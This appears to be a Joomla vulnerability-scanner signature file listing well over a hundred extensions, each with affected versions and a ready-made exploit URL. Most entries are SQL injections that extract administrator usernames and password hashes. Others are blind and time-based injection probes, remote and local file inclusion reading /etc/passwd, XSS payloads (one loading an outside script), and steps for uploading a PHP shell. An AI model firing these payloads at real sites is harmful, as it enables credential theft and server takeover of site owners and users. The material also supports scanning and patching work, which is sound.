Component: beamospetition SQL Injection Vulnerability variant 2 Version Affected: N/A|/components/com_beamospetition/|/index.php?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_flashmagazinedeluxe SQL Injection Vulnerability Versions effected: N/A|/components/com_flashmagazinedeluxe/|/index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--

Component: pcchess Blind SQL Injection Vulnerability Versions effected: N/A |/components/com_pcchess/|/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
Component: PC CookBook Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_pccookbook/|/index.php?option=com_pccookbook&page=viewrecipe&recipe_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
Component: com_waticketsystem Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_waticketsystem/|/index.php?option=com_waticketsystem&act=category&catid=1+and+1=1::/index.php?option=com_waticketsystem&act=category&catid=1+and+1=2
Component: com_eventing Blind SQL Injection Vulnerability Versions effected: 1.6.x|/components/com_eventing/|/index.php?option=com_eventing&catid=1+and+1=1::/index.php?option=com_eventing&catid=1+and+1=2
Component: com_sitemap Remote File Inclusion Vulnerability Versions effected: N/A|/components/com_sitemap/sitemap.xml.php|/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
Component: com_rss DOS Vulnerability Versions effected: Joomla! <= 1.0.7|/components/com_rss/|/index2.php?option=com_rss&feed=test
Component: com_Jambook Remote File Inclusion Vulnerability Versions effected: 1.0 beta7|/components/com_Jambook/jambook.php|/components/com_Jambook/jambook.php?mosConfig_absolute_path=
Component: com_akogallery SQL Injection Vulnerability Versions effected: N/A|/components/com_akogallery|/index.php?option=com_akogallery&Itemid=1&func=detail&id=-334455+union+select+null,null,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_gsticketsystem (catid) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_gsticketsystem/|/index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=1+and+1=1::/index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=1+and+1=2
Component: com_casino_blackjack SQL Injection Vulnerability Versions effected: 0.3.1 <=|/components/com_casino_blackjack/|/index.php?option=com_casino_blackjack&game_mode=Blackjack&shuffle=1&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_casinobase SQL Injection Vulnerability Versions effected: 0.3.1 <=|/components/com_casinobase/|/index.php?option=com_casinobase&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_casino_videopoker SQL Injection Vulnerability Versions effected: 0.3.1 <=|/components/com_casino_videopoker/|/index.php?option=com_casino_videopoker&Itemid=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_agoragroup AgoraGroup Blind SQL Injection Vulnerability Versions effected: 0.3.5.3 <=|/components/com_agoragroup/|/index.php?option=com_agoragroup&con=groupdetail&id=1+and+1=1::/index.php?option=com_agoragroup&con=groupdetail&id=1+and+1=2
Component: com_jvideo SQL Injection Vulnerability Versions effected: 0.3.x|/components/com_jvideo/|/index.php?option=com_jvideo&view=user&user_id=62+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: Seminar com_seminar Blind SQL Injection Vulnerability Versions effected: 2.0.4 <=|/components/com_seminar/|/index.php?option=com_seminar&task=View_seminar&id=1+and+1=1::index.php?option=com_seminar&task=View_seminar&id=1+and+1=2
Component: Omilen Photo Gallery LFI Vulnerability Versions effected: 0.5b <=|/components/com_omphotogallery/|/index.php?option=com_omphotogallery&controller=
Component: RFI Vulnerability Versions effected: 2.1b7 <=|/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php|/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=
Component: com_bsadv Boy Scout Advancement SQL Injection Vulnerability Versions effected: 0.3 <=|/components/com_bsadv/|/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3a,password),3,4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_rsgallery2 Attacker's Backdoored Vulnerability Versions effected: legacy_1.14.3, 2.0.0b1|/components/com_rsgallery2/|According to joomlacode.org, the svn account of the author was hacked and attacker injected remote command execution backdoor. If you have access to the source code, search & examine for eval, exec in /components/rsallery2
Component: com_agora Remote File Upload Vulnerability Versions effected: 3.0.0 <=|/components/com_agora/|Requires Member registration to verify. After registration, go to site.com/index.php?option=com_agora&task=upload and upload a php shell. Check if it's at /components/com_agora/img/members/0/yourshell.php.
Component: com_juser SQL Injection Vulnerability Versions effected: N/A|/components/com_juser/|/index.php?option=com_juser&task=show_profile&id=+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_mosres (property_uid) SQL Injection Vulnerability Versions effected: 4.5.2 <=|/components/com_mosres/|/index.php?option=com_mosres&task=viewproperty&property_uid=99+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_school SQL Injection Vulnerability Versions effected: 1.4 <=|/components/com_school/|/index.php?option=com_school&Itemid=null&func=showclass&classid=99+union+select+concat(username,0x3a,password),null+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_moofaq MooFAQ LFI Vulnerability Versions effected: 1.0 <=|/components/com_moofaq/|/components/com_moofaq/includes/file_includer.php?gzip=0&file=
Component: com_portafolio (cid) SQL Injection Vulnerability Versions effected: N/A|/components/com_portafolio/|/index.php?option=com_portafolio&task=viewcat&cid=-1+and+1=2+union+select+1,2,3,4,5,6,7,0x3A6166626337346430363332333063626162356432393066646130393633636537,9--&Itemid=5
Component: com_booklibrary RFI Vulnerability Versions effected: 1.5.2.4 <=|/components/com_booklibrary/|/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=
Component: com_media_library RFI Vulnerability Versions effected: 1.5.3 <=|/components/com_media_library/|/com_media_library/toolbar_ext.php?mosConfig_absolute_path=
Component: RFI Vulnerability Versions effected: N/A|/components/com_realestatemanager/|/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=
Component: com_vehiclemanager RFI Vulnerability Versions effected: 1.0 <=|/components/com_vehiclemanager/|/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=
Component: com_projectfork LFI Vulnerability Versions effected: 2.0.10 <=|/components/com_projectfork/|/index.php?option=com_projectfork&section=
Component: com_ijoomla_rss Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_ijoomla_rss/|/index.php?option=com_ijoomla_rss&act=xml&cat=1+and+1=1::/index.php?option=com_ijoomla_rss&act=xml&cat=1+and+1=2
Component: com_jumi (fileid) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_jumi/|/index.php?option=com_jumi&fileid=1+and+1=1::/index.php?option=com_jumi&fileid=1+and+1=2
Component: com_tickets (id) SQL Injection Vulnerability Versions effected: N/A|/components/com_tickets/|/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_pinboard Remote File Upload Vulnerability Versions effected: N/A |/components/com_pinboard/|/components/com_pinboard/popup/popup.php?option=showupload
Component: com_amocourse (catid) SQL Injection Vulnerability Versions effected: N/A|/components/com_amocourse/|/index.php?option=com_amocourse&task=view&view=category&catid=1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_pinboard SQL Injection Vulnerability Versions effected: N/A|/components/com_pinboard/|/index.php?option=com_pinboard&Itemid=1&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,concat(username,0x3a,password),8,9,10%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_bookflip(book_id) SQL Injection Vulnerability Versions effected: 2.1 <=|/components/com_bookflip/|/index.php?option=com_bookflip&book_id=-9999+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_k2 (sectionid) SQL Injection Vulnerability Versions effected: 1.0.1 Beta <=|/components/com_k2/|/index.php?option=com_k2&view=itemlist&category=null'+and+1=2+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72
Component: com_php (id) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_php/|/index.php?option=com_php&Itemid=[INSERT]&id=[INSERT]+and+1=1::/index.php?option=com_php&Itemid=[INSERT]&id=[INSERT]+and+1=2
Component: mod_letterman XSS Vulnerability Versions effected: 1.2.4 <=|/components/mod_letterman/|/index.php?option=com_letterman&task=view&id=1&Itemid=1%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Component: com_googlebase VirtueMart RFI Vulnerability Versions Affected: 1.1 <= |/components/com_googlebase/|/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
Component: com_googlebase VirtueMart RFI Vulnerability Versions Affected: 1.1 <= |/administrator/components/com_googlebase/|/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
Component: J! Reactions RFI Vulnerability Versions Affected: 1.8.1 <= |/administrator/components/com_jreactions/|/administrator/components/com_jreactions/langset.php?comPath=
Component: mosListMessenger com_lmo SQL Injection Vulnerability Versions effected: 2.1.0 <=|/components/com_lm/|/index.php?option=com_lms&task=showTests&cat=-1+union+select+1,concat(username,0x3a,password),3,4,5,6,7+from jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_akobook (gbid) Guestbook SQL Injection Vulnerability Versions effected: SE 2.3 <= |/components/com_akobook/|N/A
Component: com_akobook Guestbook XSS Vulnerability Versions effected: SE 3.42 <= |/components/com_akobook/|Input passed to the "gbmail"/"gbpage" parameters in the signing page (generally index.php?option=com_akobook&func=sign) is not properly sanitised. Submit gbmail as a' onblur=alert(0) a='. To confirm, go back signing page. Click the mail input box. Press tab and you got XSS.
Component: com_propertylab (auction_id) SQL Injection Vulnerability Versions effected: N/A|/components/com_propertylab/|/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_mailarchive XSS Vulnerability Versions effected: N/A|/components/com_mailarchive/|/index.php?option=com_mailarchive&Itemid=212&view=EXP&perpage=20&revdate=on&datestart=&dateend=&author="><script>alert(0)</script>&subject="><script>alert(0)</script>&exactsubject="><script>alert(0)</script>&search=&submit=Apply
Component: com_journal XSS Injection Vulnerability Versions effected: N/A|/components/com_journal/|/index.php?option=com_journal&Itemid=213&page=index&journal=default&view=FULL&logfile=ALL&icon=ALL&version=ALL&buildstart=&buildend=&perpage=20&search="><script>alert(0)</script>&find=Find
Component: com_simplefaq SQL Injection Vulnerability Versions effected: N/A|/components/com_simplefaq/|/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_gallery SQL Injection Vulnerability Versions effected: N/A|/components/com_gallery/|/index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,concat (username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_category (cat_id) SQL Injection Vulnerability Versions effected: N/A|/components/com_category/|/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_jobline (search) Blind SQL Injection Vulnerability Versions effected: 1.3.1 <=|/components/com_jobline/|/index.php?option=com_jobline&task=results&Itemid=&search=%' and 1=1 and '%'='::/index.php?option=com_jobline&task=results&Itemid=&search=%' and 1=2 and '%'='
Component: com_knowledgebase addon FCKEditor Abuse of Functionalities Vulnerability Versions effected: 2.6.1.4 <=|/components/com_knowledgebase/fckeditor/fckeditor.js|Certain versions of FCKeditor have multiple security vulnerabilities.
Component: X-Shop RFI Vulnerability Versions Affected: 1.7 <= |/administrator/components/com_x-shop/|/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=
Component: Taskhopper (com_thopper) RFI Vulnerability Versions effected: 1.1 <=|/components/com_thopper/|/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
Component: com_asortyment (katid) SQL Injection Vulnerability Versions effected: N/A|/components/com_asortyment/|/index.php?option=com_asortyment&Itemid=36&lang=pl&task=kat&katid=-9999999+union+select+0,concat(username,0x3a,password),2,3,4,5,6,7,8,9+from+jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_awesom SQL Injection Vulnerability Versions effected: N/A|/components/com_awesom/|/index.php?option=com_awesom&Itemid=99&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_be_it_easypartner RFI Vulnerability Versions effected: N/A|/components/com_be_it_easypartner/|/components/com_be_it_easypartner/be_it_easypartner.ajax.php?mosConfig_absolute_path=
Component: com_blog (pid) SQL Injection Vulnerability Versions effected: N/A|/components/com_blog/|/index.php?option=com_blog&name=aria-Security.Net&task=view&pid=\x27\x6F\x72 SELECT *
Component: com_activities SQL Injection Vulnerability Versions effected: N/A|/components/com_activities/|/index.php?option=com_activities&Itemid=51&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_catalogshop SQL Injection Vulnerability Versions effected: 1.0 beta 1 <=|/components/com_catalogshop/|/index.php?option=com_catalogshop&Itemid=99&func=detail&id=-1/**/union/**/select/**/null,null,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_guide SQL Injection Vulnerability Versions effected: N/A|/components/com_guide/|/index.php?option=com_guide&category=-999999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_clickheat RFI Vulnerability Versions effected: N/A|/components/ com_ clickheat/|/index.php?option=com_ clickheat&task=
Component: com_clickheat XSS Vulnerability Versions effected: N/A|/components/com_clickheat/|/index.php?option=com_ clickheat&task=http://ha.ckers.org/xss.js
Component: Community Exchange com_cx (user_id) SQL Injection Vulnerability Versions effected: 1.0.0 <=|/components/com_cx/|/index.php?option=com_cx&task=showrating&user_id=-3+union+select+1,concat(username,0x3a,password),3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_eventlist (did) SQL Injection Vulnerability Versions effected: 0.8 <=|/components/com_eventlist/|/index.php?option=com_eventlist&func=details&did=9999999999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_estateagent SQL Injection Vulnerability Versions effected: 0.1 <=|/components/com_estateagent/|/index.php?option=com_estateagent&Itemid=99&func=showObject&info=contact&objid=-9999/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*&results=null
Component: com_downloads(cat) SQL Injection Vulnerability Versions effected: N/A|/components/com_downloads/|/index.php?option=com_downloads&Itemid=99&func=selectcat&cat=-1/**/union/**/select/**/0,concat(username,0x3a,password),2/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_detail(cat) SQL Injection Vulnerability Versions effected: N/A|/components/com_detail/|/index.php?option=com_detail&Itemid=99&id=-1/**/union/**/select/**/0,1,2,3, /index.php?option=com_downloads&Itemid=null&func=selectcat&cat=-1/**/union/**/select/**/0,concat(username,0x3a,password),2,3/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_datsogallery SQL Injection Vulnerability Versions effected: 1.3.1 <=|/components/com_datsogallery/|/index.php?option=com_datsogallery&func=detail&id=-999+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,1,2,3,4,5+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: Dada Mail Manager Component Remote File Inclusion Vulnerability Version Affected: 2.6 <= |/administrator/components/|/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Component: Facile Forms RFI Vulnerability Versions Affected: N/A|/components/com_facileforms/|/components/com_facileforms/facileforms.frame.php?ff_compath=
Component: com_foevpartners SQL Injection Vulnerability Versions effected: N/A|/components/com_foevpartners/|/index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_inter SQL Injection Vulnerability Versions effected: N/A|/components/com_inter/|/index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/0,1,2,3,concat(username,0x3a,password),5,6,7,8,9/**/from/**/jos_user+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_emcomposer SQL Injection Vulnerability Versions effected: N/A|/components/com_emcomposer/|N/A
Component: com_ixxocart SQL Injection Vulnerability Versions effected: 3.9.6.1 <|/components/com_ixxocart/|/index.php?option=com_ixxocart&Itemid=1&p=catalog&parent=1\x27\x4F\x52+SELECT+*&pg=1
Component: com_publication SQL Injection Vulnerability Versions effected: N/A|/components/com_publication/|/index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,concat(username,0x3a,password),0,0,0,0,0/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_lexikon SQL Injection Vulnerability Versions effected: N/A|/components/com_lexikon/|/index.php?option=com_lexikon&id=-1/**/union/**/select/**/0,concat(username,0x3a,password),2/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: com_filebase SQL Injection Vulnerability Versions effected: N/A|/components/com_filebase/|/index.php?option=com_filebase&Itemid=-999&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),1,2/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: Almond Classifieds com_aclassf (id) Blind SQL Injection Vulnerability Versions effected: 5.6.2 <=|/components/com_aclassf/|/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=1::/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=2
Component: Almond Classifieds com_aclassf (replid) Blind SQL Injection Vulnerability Versions effected: 7.5 <=|/components/com_aclassf/|/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=1::/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=2
Component: Almond Classifieds com_aclassf (addr) XSS Vulnerability Versions effected: 7.5 <=|/components/com_aclassf/|/components/com_aclassf/gmap.php?addr="><script>alert(1)</script>
Component: com_pms SQL Injection Vulnerability Versions effected: 2.0.4 <=|/components/com_pms/|Requires valid user account on the target site. See for more information -> http://milw0rm.com/exploits/9398
Component: com_joomloads SQL Injection Vulnerability Versions effected: N/A|/components/com_joomloads/|/index.php?option=com_joomloads&view=package&Itemid=2&packageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users-
Component: Kunena Forums com_kunena (func) Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_kunena/|/index.php?option=com_kunena&Itemid=-3&func=1+and+1=1::/index.php?option=com_kunena&Itemid=-3&func=1+and+1=2
Component: com_misterestate Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_misterestate/|/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=1::/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=2
Template: be2004-2 File Inclusion Vulnerability Versions Affected: 2 <= |/templates/be2004-2/|/templates/be2004-2/index.php?mosConfig_absolute_path=
Module: AutoStand Category mod_as_category File Inclusion Vulnerability Versions Affected: 1.x <= |/modules/mod_as_category.php|/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
Module: Quick Question module Versions Affected: 4.5.1 <= |/modules/mod_quick_question.php|N/A
Module: Module mod_pxt File Inclusion Vulnerability Versions Affected: N/A |/modules/mod_pxt/|/modules/mod_pxt/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
Module: mod_calendar File Inclusion Vulnerability Versions Affected: N/A|/modules/mod_calendar.php|/modules/mod_calendar.php?absolute_path=
Extension: UIajaxIM XSS Vulnerability Versions effected: 1.1 <=|/ajaxim/|Requires valid user account on the target site. See for more information -> http://milw0rm.com/exploits/9244
Component: JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities: SQL Injection Versions Affected: 1.5.1 |/index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users|/index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
Component: JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities: Local File Inclusion Versions Affected: 1.0 |/index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00|/index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
Component: JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities: SQL Injection Versions Affected: 1.0 |/index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))|/index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
Component: Joomla Component (com_elite_experts) SQL Injection Versions Affected: "any" |/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=|/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
Component: JComponent com_ezautos SQL Injection Versions Affected: "any"|/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1|/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
Component: TimeTrack SQL Injection Versions Affected: 1.2.4|/index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users|/index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
Component: Joomla JGen Component SQL Injection Versions Affected: "any" |/index.php?option=com_jgen&task=view&id=|/index.php?option=com_jgen&task=view&id=
Component: Joomla Component Mosets Tree 2.1.5 Shell Upload Versions Affected: 2.1.5 |/http://{target}/components/com_mtree/img/listings/o/{id}.php where {id}|/http://{target}/components/com_mtree/img/listings/o/{id}.php where {id}
Component: JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion Versions Affected: 1.0 Alpha 3 |/index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00|/index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
Component: JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion Versions Affected: 1.0 Alpha 3 |/index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00|/index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
Component: Visitors Google Map SQL Injection Versions Affected: 1.0.1 |/modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0|/modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
Component: Joomla Component Aardvertiser SQL Injection Versions Affected: 2.1 |/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view|/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
Component: Joomla Component Clantools SQL Injection Versions Affected: 1.2.3 |/index.php?option=com_clantools&squad=1+|/index.php?option=com_clantools&squad=1+
Component: Joomla Component Clantools SQL Injection Versions Affected: 1.2.3 |/index.php?option=com_clantools&task=clanwar&showgame=1+|/index.php?option=com_clantools&task=clanwar&showgame=1+
Component: Joomla Component Clantools SQL Injection Versions Affected: 1.5 |/index.php?option=com_clantools&squad=1+|/index.php?option=com_clantools&squad=1+
Component: Joomla Component JE Pro SQL Injection Versions Affected: 1.5.0 |/index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2|/index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
Component: Joomla Component JE Pro SQL Injection Versions Affected: 1.5.0 |/index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2|/index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
Component: PhotoMap Gallery SQL Injection Versions Affected: 1.6.0 |/index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))|/index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
Component: JComponent Zoom Portfolio SQL Injection Versions Affected: 1.5 |/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=|/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
Component: Joomla Component (com_Fabrik) SQL Injection Versions Affected: "any"|/index.php?option=com_fabrik&view=table&tableid=13+union+select+1----|/index.php?option=com_fabrik&view=table&tableid=13+union+select+1---
Component: Biblioteca SQL Injection Versions Affected: 1.0 Beta |/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23|/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
Component: Biblioteca SQL Injection Versions Affected: 1.0 Beta |/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23|/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
Component: Biblioteca SQL Injection Versions Affected: 1.0 Beta |/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23|/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
Component: Joomla Component com_zina SQL Injection Versions Affected: 2.x |/index.php?option=com_zina&view=zina&Itemid=9|/index.php?option=com_zina&view=zina&Itemid=9
Component: JComponent com_extcalendar SQL Injection Versions Affected: "Any" |/components/com_extcalendar/cal_popup.php?extmode=view&extid=|/components/com_extcalendar/cal_popup.php?extmode=view&extid=
Component: JComponent (com_ongallery) SQL Injection Versions Affected: "Any" |/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--|/index.php?option=com_ongallery&task=ft&id=-1+order+by+1-
Component: JComponent (com_ongallery) SQL Injection Versions Affected: "Any" |/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--|/index.php?option=com_ongallery&task=ft&id=-1+union+select+1-
Component: Jgrid Local File Inclusion Versions Affected: 1.0|/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00|/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
Component: Joomla "com_equipment" Sql Injection Versions Affected: "Any" |/index.php?option=com_equipment&view=details&id=|/index.php?option=com_equipment&view=details&id=
